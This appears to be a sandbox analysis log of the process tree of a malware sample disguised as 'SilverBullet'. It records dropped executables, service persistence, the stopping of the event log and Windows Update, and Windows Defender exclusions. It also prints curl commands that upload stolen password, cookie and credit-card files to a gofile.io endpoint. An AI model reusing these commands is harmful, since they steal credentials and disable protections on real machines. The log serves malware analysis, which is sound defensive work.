C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2972

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3024

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3220

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/xuEKgb
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffb27329758,0x7ffb27329768,0x7ffb27329778
3⤵
PID:4568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1532 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:2
3⤵
PID:1836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1812 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:1512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2920 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:2072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2928 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4408 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:4520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3800 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:4064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:4480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5216 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:4296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5436 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5624 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:1324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5672 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:3148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:4056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5968 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:4500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5724 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:2084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3028 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:1444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6180 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:4180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:3844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4792 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6676 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:2440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6728 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:4176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6848 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:5816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6492 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:5712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6700 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:5696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=2188 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:2324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=7112 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:4836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6672 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:5176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=996 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:5208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6192 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:4392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5504 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2320 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:5464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=6808 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:4332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=4828 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:2928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7032 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4836 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:4796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=2148 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:5176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4972 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:60

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7080 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:2348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5376 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3712 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:2820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4972 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:5852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6924 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:5732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=1668 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:5768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2388 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:4880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=6860 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:5124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6912 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:3640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6748 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:5924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6632 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:8
3⤵
PID:68

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=4736 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:4612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=6568 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:5804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=7052 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:1
3⤵
PID:5648

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\SilverBullet\" -ad -an -ai#7zMap10653:86:7zEvent26672
2⤵
- Suspicious use of FindShellTrayWindow
PID:68

C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\SilverBulletV1.4.EXE
"C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\SilverBulletV1.4.EXE"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4220

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE
3⤵
- Executes dropped EXE
PID:3000

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2584

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\num3.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\num3.EXE
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3512

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num2.EXE
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2528

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jhi_service.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jhi_service.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1808

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
PID:2032

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
PID:4524

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
PID:2896

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
PID:648

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "HDNFMUHS"
6⤵
- Launches sc.exe
PID:2444

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "HDNFMUHS" binpath= "C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe" start= "auto"
6⤵
- Launches sc.exe
PID:1080

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:4212

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "HDNFMUHS"
6⤵
- Launches sc.exe
PID:3336

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MicrosoftEdgeUpdater.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MicrosoftEdgeUpdater.exe
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4824

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:4012

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
7⤵
PID:4904

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
6⤵
- Launches sc.exe
PID:2372

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:3148

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
6⤵
- Launches sc.exe
PID:2612

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
6⤵
- Launches sc.exe
PID:3844

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
6⤵
- Launches sc.exe
PID:4024

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
PID:4368

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2424

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
PID:2324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4608

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
PID:2904

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3640

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
PID:2068

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3036

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "YWZWALUU"
6⤵
- Launches sc.exe
PID:3136

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4616

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "YWZWALUU" binpath= "C:\ProgramData\bbskkvrqdoji\fdjrmaypnxal.exe" start= "auto"
6⤵
- Launches sc.exe
PID:6020

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:6056

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "YWZWALUU"
6⤵
- Launches sc.exe
PID:6064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:6080

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num1.EXE
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3120

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe
5⤵
- Executes dropped EXE
PID:4076

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
5⤵
- Loads dropped DLL
PID:3460

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
6⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
PID:5156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
7⤵
PID:2428

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:5492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
7⤵
PID:5136

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:4280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
7⤵
PID:2584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:2988

C:\Windows\system32\cmd.exe
